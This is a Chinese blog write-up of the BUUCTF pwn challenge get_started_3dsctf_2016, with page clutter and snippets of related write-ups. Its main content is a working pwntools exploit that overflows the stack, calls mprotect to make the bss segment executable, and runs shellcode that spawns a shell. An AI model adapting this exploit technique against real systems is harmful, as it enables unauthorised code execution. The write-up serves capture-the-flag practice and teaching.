【BUUCTF - PWN】get_started_3dsctf_2016

最新推荐文章于 2024-01-12 16:48:11 发布
最新推荐文章于 2024-01-12 16:48:11 发布
阅读量1.5k 收藏 4
点赞数 2
分类专栏: BUUCTF - PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/105107292
版权

checksec一下,可以栈溢出

IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的题了

但是,本地打通非常容易,可是靶机打不通 =_=
于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='i386'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('xxx',xxx)
elf=ELF('./get_started_3dsctf_2016')

bss=0x080eb000
pop_ebx_esi_edi_ret=0x080509a5

payload='a'*0x38+p32(elf.sym['mprotect'])+p32(pop_ebx_esi_edi_ret)+p32(bss)+p32(0x2d)+p32(7)+p32(elf.sym['read'])+p32(bss)+p32(0)+p32(bss)+p32(0x2d)
sl(payload)
payload=asm(shellcraft.sh())
sl(payload)

io.interactive()

附件:get_started_3dsctf_2016

古月浪子
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
get_started_3dsctf_2016BUUCTF】(两种解法)
qq_41696518的博客
08-27 1191
get_started_3dsctf_2016
BUUCTF get_started_3dsctf_2016
红叶的博客
10-29 401
最后必须要返回exit,因为本题没有开启标准输入输出,输入输出会在缓冲区呆着,而exit执行后会将缓冲区输出,则可回显flag。需要 -0x04,因为是32位程序,并且返回地址要改成 get_flag 的地址。溢出 + get_flag地址 + exit + 2个判断条件。溢出 + get_flag地址 + 2个判断条件。但是这个思路还缺少一步。key,key1的地址。
Pwn】get_started_3dsctf_2016
ethan18的博客
07-20 208
这是一个有点难度的题目,反正我是后面去看师傅们的wp了。。。这个题目听大家讲本地的和远程的exp居然还是有差别的首先拿到文件,开始老三样查看主要看在哪个平台:32位还是64位,还有就是有没有canary,如果有的话一般来说都不会是栈溢出攻击的题目然后拖进ida这个可以看出真的是一个栈溢出攻击我们还可以看到get_flag函数看出来是直接进行溢出到第8行地址就行。但是注意,可能是由于这题目远程的时候一些奇妙问题,在我们使用远程的时候没有正常退出会导致出错,无法获取回显。
BUUCTF--get_started_3dsctf_20161
最新发布
qq_30528603的博客
01-12 452
题目一进来有很多函数,盲猜是静态编译了。而且在函数堆中发现了个get_flag。信心慢慢的直接写代码返回get_flag地址。2.这题在main函数开始的时候没有压入ebp,因此计算溢出位置不用覆盖ebp。也就是说以前的old_ebp的位置变成了现在的返回地址。1.打远程的时候他将会判断参数是否合规,因此我们要构造get_flag的参数的正确性。这题我本来以为是简单的ret2text.结果还是中了小坑。4.构造垃圾数据不用b‘a',打不通。这题还有一种解法,我是看别的师傅wp才知道的。
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 525
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ctf【get_started_3dsctf_2016
HUANGliang_的博客
10-29 173
ret2libc a1 == 0x308CD64F && a2 == 0x195719D1 get_flag函数地址0x80489A0 main函数地址0x8048A20
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 639
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
get_started_3dsctf_2016
Trick的博客
11-24 173
先看ida 发现get_flag函数需要a1和a2两个参数等于特定值就可以读到flag 可以利用main中的栈溢出进行传参 32位程序payload = offset + 函数地址 + 返回地址 + 参数 返回地址我们利用程序中的exit: exp: from pwn import * p = remote('node3.buuoj.cn',29726) context.log_level = 'debug' sleep(0.1) get_flag = 0x080489A0 exit_addr = 0x
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 3646
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 325
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
get_started_3dsctf_2016 题解
lifanxin的博客
12-11 1030
Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未开启。 运行程序: 静态分析 动态调试 求解思路 求解脚本 ...
get_started_3dsctf_2016 | PWN | BUUCTF | mprotect函数
Dem1的博客
04-16 203
【声明:我不会做,所以学习别人的看看能不能看懂】 from pwn import * context(arch='i386',os='linux') r=remote('node4.buuoj.cn',29114) elf=ELF('./get_started_3dsctf_2016') mprotect_addr=elf.symbols['mprotect'] read_addr=elf.symbols['read'] main_addr=elf.symbols['main'] ppp3_addr=0x
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值